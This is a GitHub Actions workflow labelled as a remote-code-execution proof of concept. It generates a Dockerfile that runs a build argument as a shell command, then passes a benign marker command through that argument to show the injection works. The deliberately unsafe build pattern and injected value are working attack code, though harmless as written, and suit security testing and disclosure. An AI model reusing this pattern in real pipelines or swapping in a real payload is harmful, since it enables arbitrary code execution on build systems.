name: RCE Proof of Concept

on: [push]

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout repo
        uses: actions/checkout@v3

      - name: Inject Dockerfile with RCE payload
        run: |
          echo "FROM alpine" > Dockerfile
          echo "ARG PYTHON_VERSION" >> Dockerfile
          echo 'RUN /bin/sh -c "$PYTHON_VERSION"' >> Dockerfile

          docker build \
            --build-arg PYTHON_VERSION='echo RCE_SUCCESS > /RCE_MARKER' \
            -t hacked-image .

          docker run --rm hacked-image cat /RCE_MARKER || echo "No RCE"
